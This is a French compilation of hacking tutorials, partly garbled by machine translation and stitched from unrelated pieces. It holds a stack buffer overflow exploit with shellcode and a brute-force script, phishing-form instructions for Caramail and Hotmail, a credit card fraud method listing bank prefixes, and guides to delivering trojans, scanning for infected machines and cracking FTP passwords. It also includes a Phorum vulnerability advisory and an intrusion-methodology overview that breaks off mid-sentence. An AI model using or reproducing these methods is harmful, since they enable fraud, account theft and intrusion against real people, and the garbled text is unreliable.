En conclusion, après cette discussion, nous pouvons faire face au

"DÉBORDEMENT"(OVERFLOW) que notre problème est pour comprendre ce qui se produit dans la PILE quand un débordement se produit. Nous pourrions noter que quand nous déclarons une variable, son espace relatif est

assigné EN PILE :

A[10] in main() sub !N_texte!x18,%esp

Le débordement se produit quand nous allons au-dessus de la limite supérieure réservée pour la variable en pile. Par le débordement de pile il est possible de recouvrir le lien dynamique (EBP) et l'indicateur de retour trop (EIP) changeant le temps d'exécution la prochaine instruction d'être exécuté quand la routine revient.

Le programme suivant montre la vulnérabilité.

//VULNERABLE.C
#include

main(int argc, char *argv[])
{
char a[100];
strcpy(a, argv[1]);
}

Nous pouvons passer comme argv[1 ] n'importe quelle chaine plus longtemps que 100 chars.

Commencer le programme : Perl vulnérable de ` - le programme de

x128'` du l''impression "A" de e a reçu le signal SIGSEGV, défaut de

segmentation.

(gdb) 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb) info reg ebp
ebp 0x41414141 0x41414141

Comme vous pouvez voir l'ee pourrait recouvrir EBP et EIP qui se dirigent maintenant au ` 0x41414141'(hexadécimal codez du ` A de lettre 'causant le défaut de segmentation. Maintenant nous pouvons exécuter n'importe quelle instruction souhaitée, un fait qu'elle est assez pour ajouter le shellcode dans le programme qui lance le « vulnérable » et a laissé l'indicateur d'Istruction se diriger à son

premier byte.

La conclusion hors de l'adresse absolue du shellcode n'est pas aussi facile, c'est pourquoi simplifier pour n'importe quoi on préfèrent mettre le shellcode au milieu de l'amortisseur et compléter partout de NOPs. Nous frapperons probablement un du NOPs dans la chaîne, auquel nous joindrons le shellcode. Voici l'exploit pour le programme vulnérable.

L'adresse de retour relative (retour) a été obtenue comme suit :

Commencer le programme : Perl vulnérable de ` - printf "a" x 260'` de

e '

Le programme a reçu le signal SIGSEGV, défaut de segmentation.

0x61616161 in ?? ()
(gdb) info reg esp
esp 0xbfffdb40 0xbfffdb40
(gdb)

L'adresse de retour absolue sera à côté de notre retour, il sera

assez d'utilisation d'un certain bruteforce pour découvrir le bon

excentrage.

//EXPLOIT.C
#include

#define NOP 0x90 // NOP OPCODE
#define LEN 128 // Buffer Size
#define RET 0xbfffdb40 // return Address

static char shellcode[]=
"xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d"
"x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";

main(int argc, char *argv[])
{
char buffer[LEN];
long retaddr = RET atoi(argv[1]);
int i;
printf("Shellcode size : %d ", strlen(shellcode));
fprintf(stderr,"Using address 0x%lx ",retaddr);

// Build the overflow string.
for (i = 0; i < LEN; i = 4) *(long *) &buffer[i] = retaddr;

// copy NOP
for (i=0; i<(LEN-strlen(shellcode)-10);i ) *(buffer i) = NOP;

// Copy the shellcode into the buffer.
memcpy(buffer i,shellcode,strlen(shellcode));

// Execute the program
execlp(“vulnerable", "vulnerable", buffer, NULL);
}


//BRUTE.PL
#!/usr/bin/perl
$MIN=0;
$MAX=5000;

while($MIN<$MAX)
{
printf(" offset : $MIN ");
system("./exploit $MIN");
$MIN ;
}


Conclusions



$./brute.pl
…….
Shellcode size : 38
Using address 0xbfffdbc5
offset : 134
Shellcode size : 38
Using address 0xbfffdbc6
offset : 135
Shellcode size : 38
Using address 0xbfffdbc7
sh-2.05b$

Nous pourrions exécuter le shellcode exploitant le débordement de PILE. L'existence d'un programme vulnérable représente une menace sérieuse pour la sécurité de nos systèmes. Un attaquant pourrait exécuter le code arbitraire avec des permissions élevées si possible. En fait n'existe aucune manière d'être sûre en raison de la nature des attaques, infact qu'elles sont basées sur des erreurs de programmation, pour cette raison il est très important de maintenir le logiciel constamment amélioré.

Les attaques de type buffer overflow

Un buffer overflow est une attaque visant à expoiter une faille dans une application (navigateur web etc...) pour exécuter un code arbitraire.
En pratique, une attaque de type buffer overflow fait crasher le programme en écrivant dans un buffer plus de donné qu'il ne peut en contenir ( un buffer est une zone de mémoire temporaire utilisée par une application) dans le but d'éffacer une partie du code de l'application et d'y injecter le code pour exploiter le plantage de l'application.

Cette technique requière cependant un excellent niveau en programmation pour être exploité. Son principal intérêt est qu'il ne nécessite pas dans la plupart des cas un accés au système . Elle est donc redoutablement efficace !

Comment éviter ce type de faille?

-On peut par exemple utiliser un language qui n'autorise pas ce type de faille (Java...)
-Utiliser des logiciels spécialisé dans la vérification du code source
-Avoir des produits mise à jours
-Utiliser des logiciels bien codé

Formulaire piégé caramail

Caramail
Hacker une boîte caramail
* Formulaire piégé !
Le formulaire, c'est une technique très connue qui est surtout applicable quand l'inocente victime n'est pas trop inteligente ... (disons qu'on va jouer avec le côté con du pigeon !) On va tout simplement lui envoyer un formulaire semblable à un formulaire d'erreur de son fournisseur lui demandant de mettre son mot de passe car un problème est survenue ! Il faut remplacer "votre e-mail@fournisseur.com" par votre mail. Il faut envoyer le tout en html. Vous pouvez envoyer ce formulaire er vous créant une boite sur caramail. Pour que ce soit plus crédible, prenez une adresse de type admin@caramail.com.

Vous pouvez aussi utilisez Ghostmail pour envoyez les formulaires. En effet, c'est un logiciel de mail anonyme qui permet aussi d'envoyer des formulaires puisqu'il a une option "envoyer en html". Il est plutot facile a utiliser. D'abord vous le télécharger dans la rubrique download et vous l'ouvrez. Vous faites copier-coller le code dans le champ message et vous remplissez les données demandez (expéditeur, destinataire...). Il y a plusieurs onglets pour les options. Naviguez dans les onglets et cochez la case "envoyer en html" (ou kekchose de ce genre). Il va falloir entrez un serveur par exemple smtp.free.fr, smtp.laposte.net... Avant d'envoyer le formulaire, vérifiez bien que vous avez mis votre e-mail à la place de "votreemail@fournisseur.com. Cliquez sur envoyez et c'est terminé!!!

voilà le code du formulaire:

Le carding est une fraude de cartes bleues. C'est une méthode qui consiste à trouver un numero de CB ( carte bancaire)valide, ainsi que sa date d'expiration. Cela se fait grace à un algorithme. Des logiciels permettent de faire ce calcul rapidement.

Comment trouver un numéro de CB valide et sa date d'expiration?
tout d'abord, il vous faut un générateur de numero de CB.
Avec ce GNCB (Générateur CB), vous générez une liste de numero valides. Ensuite
vous prenez votre carte de crédit (ou celle d'un copain).
Le numero est représenté sous cette forme:

XXXX - XXXX - XXXX - XXXX XX/XX
série1 | série2 | série3 | série4 Date d'exp
Vous comparez votre liste de numero avec celui de votre carte, puis vous
conservez seulement les numeros dont la série4 est inférieure à celle de votre
carte. La date d'expiration sera donc inférieure ou égale à la votre.

Prenons un exemple (En rouge, c'est la série4) :

XXXX - XXXX - XXXX - 3642 <=== Votre numero de carte de crédit.
XXXX - XXXX - XXXX - 4518 <=== Série 4 supérieure à la votre: à rejeter.
XXXX - XXXX - XXXX - 6468 <=== Série 4 supérieure à la votre: à rejeter.
XXXX - XXXX - XXXX - 3258 <=== Série 4 inférieure à la votre: à conserver.
XXXX - XXXX - XXXX - 8473 <=== Série 4 supérieure à la votre: à rejeter.
XXXX - XXXX - XXXX - 3289 <=== Série 4 inférieure à la votre: à conserver.
Maintenant que l'on a deux numero intéressant, on va choisir le numero dont la
série4 est plus proche de la série4 de votre carte. Dans notre exemple c'est le
: XXXX - XXXX - XXXX - 3289.
La date de validité de votre carte est 06/02, pour trouver celle de notre carte
générée, on va allez dans un site XXX à accés gratuit où ils contrôlent si vous
êtes majeur par vérification de votre numeto de carte. On va prendre les numero
de la carte générée et pour la date, on va commencer par la votre (06/02) puis
on prendra 05/02, 04/02, 03/02, 02/02, 01/02, 12/01, 11/01, etc... jusqu'à que
la carte soit acceptée.
Et dés que vous avez votre numero et la date, vous pourez alors faire tous ce
que vous voulez

Les numeros en fonction de la banque :

Sur une carte bancaire; les quatres premiers numeros sont en fonction de la
banque.
Si vous voyez sur une CB que les quatre permiers chiffres sont : 4970, vous
savez que la personne qui a cette carte est à la poste.

Voici donc une liste des quatres premiers numeros en fonction de la banque:
4970 : La poste
4971 : Crédit Commercial
4972 : Crédit Lyonnais
4973 : Société Générale
4974 : BNP
4975 : Banque Populaire
4976 : Banque Sofinco
4978 : Caisse d'Epargne
5016 : Finedis
5032 : Accord Finances
5131 : Crédit Agricole

etc ...
voila

Vulnerabilites multiples dans Forum

Forum est une application PHP open source. Il s'agit d'un forum de discussion ecrit en php. Plusieurs failles permettent l'injection de commandes sql et il présente plusieurs vulnérabilité de type CSS (cross site scripting).

Forum est une application PHP open source. Il s'agit d'un forum de discussion ecrit en php. Plusieurs failles permettent l'injection de commandes sql et il présente plusieurs vulnérabilité de type CSS (cross site scripting).

Vulnerables:
Phorum version 3.4.5 et précédents
Immunisés:
Phorum version 3.4.6
Phorum version 5.0.2 alpha

Une vulnérabilité XSS existe dans le script common.php qui permet l'éxécution de code. Elle est présente dans la fonction phorum_check_xss(). Cette fonction est justement censé protéger de ce type d'attaque.
if(!is_array($value) && $key!="body" && $key!="subject" && $key!="hide" && stristr($value, "< script")){ echo "script detected in $key";
En envoyant une variable HTTP/post à n'importe quel script de Forum, il est possible de transformer la variable key en une attaque XSS, fournissant la valeur de la variable qui contient " Cette vulnérabilité peut être exploitée pour obtenir les login, Spammer, ou faire du social engineering .

Une autre vulnérabilité de XSS existe dans le script 'profile.php '. Si un utilisateur est logé, un attaquant pourrait employer cette vulnérabilité pour inclure un code arbitraire sur le browser de l'utilisateur. Des attaques de XSS ne sont pas juste limitées aux tags script!. Un attaquant pourrait employer beaucoup de formes de XSS (telles que l' !iframe! ) pour lancer des attaques sur des utilisateurs.
Il est ainsi possible, si l'utilisateur visé est logé, de faire un reset du mot de passe, de modifier des informations sur son compte....

Une vulnérabilité d'injection SQL existe dans le script 'register.php' dans le champ 'hide_email'.
Cette vulnérabilité peut mener à l'exécution des commandes SQL à l'intérieur du script.
En raison de l'endroit dans lequel la variable d'injection de SQL est placée, il est de plus en plus difficile d'exploiter cette vulnérabilité .

Salutation...

Si vous voulez hacker une personne, c'est que vous avez une bonne raison ! Donc, j'ai confiance en vous et je vous permet de lire ce petit "cours" (mibneo.fr ne pourra être tenu d'éventuels dégâts sur vos machines ou celles de vos victimes).

*Pour commencer il vous faut une victime (LOGIQUE), ensuite, son IP (un n° qui permet de l'identifier sur le net), pour les connectés par cable (TELEDISnet) l'IP est fixe, ce qui veux dire qu'à chaque connection elle ne change pas, tandis que les connectés par ligne téléphonique HAUT DEBIT (==> si vous utilisez un modem 56 k ou moins, ca risque d'être long, trèèèèèèèès long !) l'IP change à chaque connection, un troyen, un brouilleur d'IP ,et la dernière chose nécessaire, c'est un port infecté (chez votre victime)
Vous allez sur IRC, choissisez vous un pseudo trés simpliste, évitez les truc du style "RoiDuHack" ou autre conneries dans le genre, pour 2 raisons:
La premiere c'est que vous etes loin d'être le roi du hack...
et la seconde: niveau discrétion c'est pas terrible...
Ensuite choisissez une personne au hasard.
Faites connaissances avec cette personne, entretenez la conversation tout tranquillement et vous essayer de gagner sa confiance (jusqu'a la c'est pas dur).
Puis apres vous vous demerdez pour insérez dans la conversation que vous possédez un tout nouveau logiciel super cool etc...(ex: generateur, expansion d'un logiciel, anti-nuke etc...) Et evidemment comme vous êtes super cool, vous vous proposer gentillement pour lui envoyer si elle veut :)
Parce que c'est vrai que vous êtes pleins de bonnes intention n'est ce pas ?? :)
Si elle accepte, c'est bon, le   dur est fait...
Vous lui envoyer, elle l'installe, et evidement qu'est ce qui se passe ? : le logiciel marche pas (Oh non ! Bein pourquoi !?)
Soit il va apparaitre un petit message débile style "ce fichier est lié a un objet manquant" ou autre conneries dans le genre, ou bien il va rien se passer du tout... Dans tout les cas, votre victime va se poser des questions... alors vous lui direz, "ah bein c'est con ca, il te manque un fichier système dans ton Windows, c'est con pourtant chez moi ca marche trés bien et tout etc..." et puis vous anticipez pour lentement changer de sujet...

*Une autre technique, le fake-mail ("Faux-mail").
Vous prenez un logiciel style "Ghostmail" et vous envoyez plusieurs fake-mail à n'importe qui avec le fichier server en fichier joint, et vous racontez que c'est une expansion pour le système de messagerie etc...
Evidement, choissisez bien le nom de votre adresse pour que ce soit crédible, prenez par exemple Admin@hotmail.com , ou webmaster@caramail.com etc..

*Toujours par mail, vous utilisez le logiciel "Ex-Maker" et vous dissimulez le fichier "server" d'un troyen avec un fichier exe quelconque.
Lorsque le type regardera lancera le logiciel en question, le troyen s'executera en parallèle du "vrai" logiciel, comme si de rien n'était :)

*Une technique plus simple, mais plus longue.
Ce qui est cool c'est que vous vous faites pas chier à envoyer le fichier "server" !!
Bein comment qu'on fait alors ??
Bein facile, vous profitez des fichiers "server" déja installés sur les ordis...
Hé ouais, beaucoup de personnes sont infectés sans le savoir et on peut donc se connecter a leur ordi trés facilement sans avoir a envoyer le server...
Va vous falloir un "scanner d'IP" et une grosse collection de troyens à disposition.
Prenez le logiciel "Superscan 3.0" c'est le meilleur.
Vous n'aurez pas besoin d'autre logiciel (IRC, ICQ, etc...)
Le plus dur pour cette technique va être de trouver une IP infectée par le troyen que vous désirez utiliser, et ca, c'est pas evident, faut avoir pas mal de chance...
Alors, vous lancez votre scanner d'IP et vous scannez une plage d'une centaine d'IP Le scanner va fouiller les ordinateurs correspondant aux IP que vous lui avez demandé de scanner. Et il va chercher si il y a déjà des troyens d'installés...
Voila, c'est tout, maintenant attendre... Le scan terminé, 2 résultats possible:
- 1er résultat: Vous avez pas de chance, votre scanner à rien trouver...
Solution: Y'a plus recommencer avec d'autre IP
- 2eme résultat: Vous avez de la chance, votre scanner d'IP a trouvé un ordinateur infecté par un troyen...
Dans ce cas la, il vous dira quel est ce troyen et il vous dira aussi quel port utiliser. Alors là c'est Youpikayé, vous commencez a gesticuler dans votre siege... et il vous reste plus qu'a lancer le fichier "client" du troyen en question et de vous connecter a l'IP infectée...
Et voila, maintenant vous avez plus qu'a fouiner un peu :)
Si vous avez du mal avec Superscan 3.0, reportez vous dans la section "Tutos"
Voila, c'est pas bien compliqué, il existe encore pleins d'autre techniques, a vous de voir et de faire des tests...
Après, vous faites ce que vous voulez, mais restez le   discret possible...
Et bien sur, n'agissez pas en tant que crasher, ne bousillez pas l'ordi de votre victime pour rien. Détruisez tout, seulement si vous trouvez des trucs pédophiles, racistes etc... là, vous avez notre accord, mais sinon... soyez cool ;)

Bon là, ca ce corse, vous voulez hacker un site. OK mais pas n'importe lequel, un site raciste, pédophile, enfin des trucs dans le genre, je vous préviens, c'est plus difficile qu'une simple personne.

Bon on va faire simple et rapide:

Il vous faudra plusieurs choses essentielles:
- Etre parfaitement anonyme, c'est a dire avoir parfaitement spoofer votre IP
- Avoir une connexion haut-débit (Cable, Adsl, Tx)
- Avoir une patience à toute épreuve :)
Et il vous faudra:
- un cracker de pass (Ex: Brutus)
- un dico (facultatif)
Maintenant voila comment faire:
Prenons comme exemple un site hébergé par Chez.com : http://www.chez.com/victime
Ouvrez votre cracker de pass.
Mettez le nom du server ("www.chez.com" dans notre exemple) dans "Host"
Mettez le nom d'utilisateur ("victime" dans notre exemple) dans "user".
Vous laissez le port 21.
Vous selectionnez le dico de votre choix dans "password".
Vous cliquez sur "go" ou "start" et il trouvera tous seul le bon mot de pass.
A noter que vous êtes pas obligé d'utiliser un dico, car il existe une méthode appelée le Brute Force qui consiste à essayer toutes les combinaisons possibles pour trouver le mot de passe. Evidemment c'est encore   long. Mais au moins y'a pas besoin de dico.
Voila c'est terminé !! Sachez toutefois que ca prend beaucoup de temps...
Notez aussi que certains dicos ne sont pas compatibles avec certains crackers et vice-versa.

Maintenant dernière recommendation:
Sur ce site on vous apprend à agir en tant que "Hacker" et non en tant que Crasher !! Un "hacker" n'est pas censé foutre en l'air tous les sites qu'il visite !! Ok ??!! Ca, ca s'appelle le crashing...
Si vous voulez être respectable, attaquez-vous seulement aux sites style site racistes, pédophiles etc...
2ème méthode : TELNET
Le site que nous prendrons comme exemple sera hacker.com. La première chose à faire, avant de
ce mettre à cette tâche ardue, est de vérifier que l'on a le "matériel nécessaire", ce qui revient à
dire:

Telnet
DOS et les tracert, ping, etc...
Un crackpass (puissant)
WS_PINGPR (de préférence)
Une connaissance sous Linux ou Unix (ou même aucune)
L'url du site à pirater
Pour commencer il faut obtenir le maximum d'infos sur le site et les répertorier sur un carnet
ou sur une feuille: elles sont nombreuses.
Avoir l'url du site, son adresse IP et TCP: pour avoir ces infos aller sous dos, taper (les ">" ne
devant pas être écrit):

> tracert www.site.com

ENTREE

- Vous n'avez pas l'adresse TCP du site, vu qu'il n'en a pas.

L'adresse IP est: 209.195.130.87.

- Les infos sur les utilisateurs (grâce à WS_PINGPR):

Administrative Contact, Technical Contact, Zone Contact:Beckett, Jodi (JB11383)
jodi@NAUTICOM.NET
412-449-4600 (FAX) 412-449-4659

Billing Contact:Beckett, Jodi (JB11383) jodi@NAUTICOM.NET
412-449-4600 (FAX) 412-449-4659

Ensuite essayez (ce n'est pas le cas pour ce site), essayez sur le navigateur:
ftp://www.nomdusite.com ou ftp://ftp.nomdusite.com. ensuite vous cherchez la rubrique password,
si l'accès aux ftp par ce chemin n'est pas protégé (rare). cette rubrique password vous donnera les
logins (pas les pass) pour les utilisateurs, sinon par défaut sortez votre crackpass... mais dans
quelles conditions doit dont mettre un nom d'utilisateur et un password, et où? On verra ça un peu
après.

Puis accéder aux autres adresses IP qui sont les plus proches du site. En faisant un tracert,
l'adresse juste au dessus du site, vous donne l'adresse du routeur du site (en général, sinon
scannez le réseau). Vous prenez son adresse IP ou l'adresse locale (Local Host), vous prenez
Telnet et vous rentrez l'adresse IP, port SNMP. Vous voilà connecté au router par telnet. On vous
demandera le nom d'utilisateur et son password.

Voilà! ca c'est pour le démarrage! Ensuite... Vous allez sous DOS et vous faîtes (les ">" ne
devant pas être écrit):

> ftp
> open
> www.site.com

On vous demandera un nom d'user. Vous pouvez rentrer en anonymous si le serveur le
permet, et télécharger les pages, mais ce ne sera pas du hack, je vous dis comment faire:
vous rentrez comme nom d'user: anonymous, ensuite vous tapez n'importe quel password et vous
tapez: ls
Donc vous regardez les infos obtenus avec WS_PINGPR et vous avez plusieurs noms qui
vous sont donnés: Beckett et Jodi.
Vous essayez les 2 noms d'utilisateurs et vous remarquez que "Jodi" répond! Très bien! vous venez
de faire la moitié: vous avez trouvez un nom d'user, il vous faut maintenant le password... Inutile de
vous casser la tête! Si la personne est prudente vous n'avez aucune chance de le trouver. Sortez
votre meilleur Crackpass et essayez. Par défaut rabattez-vous sur le(s) routeurs par telnet. Bonne
chance!

Formulaire piégé hotmail

Hotmail
Hacker une boîte hotmail
* Formulaire piégé !
Le formulaire, c'est une technique très connue qui est surtout applicable quand l'inocente victime n'est pas trop inteligente ... (disons qu'on va jouer avec le côté con du pigeon !) On va tout simplement lui envoyer un formulaire semblable à un formulaire d'erreur de son fournisseur lui demandant de mettre son mot de passe car un problème est survenue ! Il faut remplacer "votre e-mail@fournisseur.com" par votre mail. Il faut envoyer le tout en html. Vous pouvez envoyer ce formulaire er vous créant une boite sur caramail. Pour que ce soit plus crédible, prenez une adresse de type admin@hotmail.com.

Vous pouvez aussi utilisez Ghostmail pour envoyez les formulaires. En effet, c'est un logiciel de mail anonyme qui permet aussi d'envoyer des formulaires puisqu'il a une option "envoyer en html". Il est plutot facile a utiliser. D'abord vous le télécharger dans la rubrique download et vous l'ouvrez. Vous faites copier-coller le code dans le champ message et vous remplissez les données demandez (expéditeur, destinataire...). Il y a plusieurs onglets pour les options. Naviguez dans les onglets et cochez la case "envoyer en html" (ou kekchose de ce genre). Il va falloir entrez un serveur par exemple smtp.free.fr, smtp.laposte.net... Avant d'envoyer le formulaire, vérifiez bien que vous avez mis votre e-mail à la place de "votreemail@fournisseur.com. Cliquez sur envoyez et c'est terminé!!!

rectification: Ghostmail est maintenant détecté par hotmail, et la fonction envoyé en html est désactivé sur hotmail. Soit vous trouvez un mail anonyme compatible html, soit vous vous créer en plus une boite sur yahoo, vous envoyez en html le code sur votre boit homtmail, une fois reçu vous cliques sur répondre et mettez l'adresse du pigeon. Eh ouais, faut ruser ;-).

voilà le code du formulaire:

Techniques d'intrusion dans les réseaux

De plus en plus d'attaques sont répertoriées par les agences officielles, ont voit surtout de plus e plus de personnes qui vont en prison, mais avez vous que la plupart des actes de piratages n'auront pas suite, car les entreprises à part un firewall et un antivirus n'ont pas de moyen pour lutter contre les "crasheurs"; nous allons aborder ici les bases qui permettent de comprendre comment font ces pirates...

Sommaire

1. Introduction..........................................................7
2. Cadre de la présentation................................................................7
3. Identification de la cible....................................................................8
3.1 DNS, Domain Name System .....................................................................8
3.2 Bases d.adresses IP ...................................................................9
3.3 Bounces de découverte .......................................................................9
3.4 Moteurs de recherche.......................................................................10
3.5 Outils réseaux de diagnostic...............................................................10
3.6 Social-engineering...........................................................................................10
4. Scanning ...................................................................................................11
4.1 Rappel sur les protocoles TCP/IP ......................................................11
4.1.1 IP..................................................................................................11
4.1.2 TCP...............................................................................................12
4.1.3 UDP..........................................................................................12
4.2 Recherche des machines actives : scan ICMP et TCP ..........................13
4.3 Port scanning TCP et UDP ......................................................................13
4.3.2 Techniques avancées de scanning.......................................................15
4.3.3 Autres techniques de découverte de la topologie........................17
5. Exploitation.....................................................................................19
5.1 Classe des attaques par usurpation d.identité............................................19
5.1.1 Découverte d.informations d.authentification par essais......................19
5.1.2 Abus de relations de confiance............................................19
5.1.3 Interception d.informations d.authentification .........................20
5.1.4 Détournement de flux existants ..............................................21
5.2 Exploitation de fautes d.implémentation.....................................21
5.2.1 Buffer overflows.....................................................................22
5.2.2 Attaques format string.............................................................23
5.2.3 Métacaractères shell et caractères spéciaux ...........................23
5.2.4 Virus, chevaux de Troie................................................23
5.3 Elévation des privilèges ...........................................................24
6. Progression ..............................................................................25
6.1 Inspection du système compromis............................................25
6.1.1 Nettoyage du système...........................................................25
6.1.2 Pose de backdoors...............................................................26
6.2 Prise d.information, progression ...............................................27
7. Conclusion..................................................................................28



1. Introduction
La connaissance des stratégies, méthodes et techniques employées par les pirates informatiques est de même
primordiale pour la compréhension de leurs comportements, et l.élaboration de lignes de
défense adaptées : quelque soit la sophistication ou le raffinement des techniques utilisées,
l.expérience nous fait dégager des lignes directrices quant au déroulement de telles attaques.
Nous allons ici décrire d.un point de vue technique les différentes phases de l.attaque1 d.un
système d.information par un agresseur situé sur Internet : de l.identification de la cible à
l.exploitation puis à la progression sur le système compromis.
2. Cadre de la présentation
Les menaces potentielles sur un système d.information sont multiformes et difficilement
identifiables en raison de la variété des agresseurs, des cibles possibles et des moyens
d.attaques.

Nous allons dans la suite considérer le cas d.un agresseur externe à l.organisation cible, quelles
que soient ses motivations et sa nature.

En première approche, les possibilités de compromission du système visé se résument à la
capacité de cet agresseur à se créer une porte d.entrée :
- Compromission directe des accès extérieurs, tels que : accès Internet, système
téléphonique (PABX), X.25 ou lignes dédiées vers des prestataires ou partenaires.
- Injection de pièges (chevaux de Troie, virus)
- Social engineering (pour obtenir indirectement ou faciliter un des points précédents),
détournement de personnel

Le présent document s.intéressera au cas des attaques directes contre l.accès Internet du
système d.information cible.
Notons finalement que même si le siège des accès Internet n.est pas la meilleur méthode pour
obtenir une intrusion réussie (X.25 et le scanning téléphonique sont beaucoup plus probants),
c.est du moins la plus facile à mettre en .uvre (multiplicité des moyens d.accès, quasi gratuité,
.) et celle pour laquelle le plus d.information est disponible.

1 Hors attaques de type déni de service.

3. Identification de la cible
Dans une première phase, l.agresseur identifie la cible dans son environnement (Internet dans
notre cas). En utilisant des informations publiques pour la plupart, il découvre les localisations et
interactions de l.organisation avec le reste d.Internet, afin d.arriver à une liste exhaustive des
accès extérieurs et donc des portes d.entrées potentielles à forcer. Il dispose à la suite de cette
phase d.un début de cartographie des environs de la cible sur le réseau Internet, des partenaires
et prestataires ayant potentiellement des liens physiques et logiques avec elle, de données
brutes telles que des noms d.employés ou numéros de téléphones, qui seront potentiellement
utiles pour des tentatives de social engineering ou de wardialing.
En fonction des motivations et des résultats attendus, cette phase peut être d.extrêmement
rapide à assez longue, étant donné que son exhaustivité déterminera en grande partie le succès
de l.intrusion, en permettant de centrer directement l.attaque sur une porte dérobée ou en
donnant des alternatives à l.attaque d.une ligne de défenses efficaces.

Dans certains cas, cette phase n.est même pas présente : il est fréquent que l.organisation
agressée ne soit pas la motivation d.une attaque. De nombreux pirates balaient des plages
d.adresses ou des pays entiers pour trouver des machines vulnérables qu.ils pourront
compromettre, le plus souvent pour servir comme point de départ pour d.autres attaques. La
cible elle-même est ainsi toute machine située dans le bloc balayé, quel que soit son
propriétaire. La phase de recherche et d.identification de la cible est donc ici quasiment
inexistante, elle se résume au balayage d.adresses IP ou d.entrées DNS.

Etant donné que la majorité des informations recueillies lors de cette phase d.identification sont
publiques (le pirate essaie d.éviter de « toucher » directement la cible), elle est assez difficile,
voire impossible à détecter. Seules certaines techniques, en particulier les balayages DNS
peuvent être visibles par les administrateurs sécurité ou les mécanismes de détection
d.intrusion.

3.1 DNS, Domain Name System
Le DNS est la base d.informations la plus évidente pour la localisation d.une cible. Afin de
connaître les noms de domaines possédés par la victime, notre agresseur peut procéder par
essais ou aller consulter les registres publiques des noms de domaines (whois).
L.interrogation des registres whois2 se fait directement par nom de domaine ou par mots clef. Le
résultat obtenu est la liste des domaines correspondants aux mots clefs entrés, ainsi que toutes
les informations associées : entre autres, noms des contacts techniques, administratifs,
adresses postales, téléphones, et adresses IP des serveurs DNS.
L.agresseur peut ensuite utiliser ces renseignements pour étendre sa recherche en interrogeant
par exemple le registre avec comme mot clef le nom du contact technique. Il obtient ainsi une
liste déjà importante de cibles potentiellement utiles pour son intrusion.
Fort de ces informations, il est ensuite utile d.évaluer l.étendue des domaines, en utilisant une
fois de plus les services du DNS. Nous pouvons ainsi déterminer si les serveurs DNS sont
hébergés chez des prestataires ou directement chez la victime. Si tel est le cas, ce prestataire
peut lui aussi devenir une cible, en cas d.attaque directe infructueuse.
Nous pouvons aussi demander une liste de tous les couples nom/adresse IP enregistrés dans le
DNS pour un domaine donné. Cette fonctionnalité, dite AXFR, est nécessaire pour le transfert




de zones entre serveurs de noms. Elle est très intéressante pour un agresseur et est donc
communément restreinte aux seuls serveurs autorisés.
Le DNS nous permet finalement d.obtenir les adresses des machines courantes, telles que
www.x.com, ftp.x.com, mail.x.com ainsi que les adresses des serveurs de messagerie externes
(entrées MX, mail-exchanger, des DNS). Un dernier type de requête, dite HINFO (host info),
donne des renseignements sur la machine cible, tels que : modèle, système d.exploitation. Les
entrées HINFO des tables DNS, pour des raisons évidentes de confidentialité et de sécurité ne
sont maintenant quasiment jamais renseignées.

2 http://whois.networksolutions.com/cgi-bin/whois/whois pour les domaines TLD .com/.net/.org, les sites
des organismes chargés de gérer les noms de domaines nationaux autrement.

3.2 Bases d.adresses IP
Nous avons vu comment le DNS procure à un pirate des informations essentielles pour la
préparation de son attaque. Le DNS n.est cependant pas exhaustif ; étant donné que chaque
machine, donc chaque adresse IP, est potentiellement une cible, notre agresseur va étendre sa
connaissance de quelques adresses IP à des blocs entiers d.adresses au moyen des bases
d.adresses que sont le RIPE, l.ARIN et l.APNIC.
Ces bases sont nécessaires au bon fonctionnement d.Internet car elles détaillent aussi bien les
organismes propriétaires, personnels à contacter que les étendues et les routages associés aux
netblocks, ces fameux pans d.adresses IP réservées sur Internet.
L.agresseur identifie donc les différentes adresses qu.il a recueillies avec DNS grâce aux
moteurs d.interrogation des bases d.IP3. Cette identification lui permet de savoir à quel netblock
appartient une adresse IP donnée, et donc l.organisation propriétaire de l.adresse. Il élargit donc
son champ d.attaque aux adresses non inscrites dans le DNS. Inversement, il va corréler le
résultat de ses recherches en interrogeant les bases d.adresses avec comme critère de
recherche le nom de la cible, des contacts techniques, .

3.3 Bounces de découverte
La plupart des serveurs de messagerie (SMTP et News) rajoutent aux messages qu.ils
véhiculent des informations de diagnostic, masquées ensuite par le logiciel client de l.utilisateur.
Ainsi, les en-têtes des e-mails comportent non seulement expéditeur, destinataire, mais aussi
tout le cheminement du message au travers des serveurs de messagerie. Typiquement, chaque
serveur rajoute au message une en-tête From : décrivant le serveur (adresse IP locale,
identification du logiciel et numéro de version) et l.heure de passage. Il en est de même pour les
messages NNTP tels que ceux postés sur Usenet.
Une technique classique de découverte consiste à envoyer un e-mail de reconnaissance à une
adresse invalide du domaine cible. L.e-mail est très souvent retourné à son expéditeur avec un
message d.erreur, d.où le nom de bounce. L.examen des en-têtes présents dans le mail
retourné va donc donner au pirate des informations importantes comme les versions des
serveurs de messagerie externes, les adresses, noms et versions des serveurs de messagerie
internes. Ces renseignements seront utiles par la suite lors des attaques et de la progression
dans le système d.information compromis.

Received: from relais.x.com ([1.2.3.4]) by smtp.Secway.com (smap) with SMTP id QAA21414 for
; Fri, 11 Aug 2000 16:20:06 0400
Received: from 192.1.1.20 by relais.x.com (InterScan E-Mail VirusWall NT); Fri, 18 Aug 2000
18:11:44 0200 (Paris, Madrid (heure d'été))
Received: by mail.x.com(Lotus SMTP MTA SMTP v4.6 (462.2 9-3-1997)) id C1256938.0043AF89 ; Fri, 11
Aug 2000 14:19:18 0200

3 Les bases sont séparées géographiquement en: RIPE (Europe): http://www.ripe.net, ARIN (Amérique du
Nord/Sud/Centrale, Caraibes, Afrique sous saharienne): http://www.arin.net, APNIC (Asie, Pacifique):
http://www.apnic.net


Le social-engineering constitue aussi un moyen direct d.utiliser ces informations comme moyen
de compromission, en appuyant la tentative de social-engineering par des informations internes
découvertes par ce biais.
Notons finalement que le problème de la sécurité des applicatifs clients est de plus en plus
préoccupant, notamment en raison de la complexité de nombreuses applications telles que les
navigateurs Web ou les logiciels clients de messageries. Les attaques dirigées sur le client (en
compromettant un serveur et modifiant son comportement, pour exploiter un bug du client par
exemple) vont en se répandant et la connaissance par le pirate des serveurs, logiciels utilisés,
. peut faciliter grandement une intrusion.
Si le bounce ne fonctionne pas (cas des bounces détruits sans retour à l.expéditeur d.origine), le
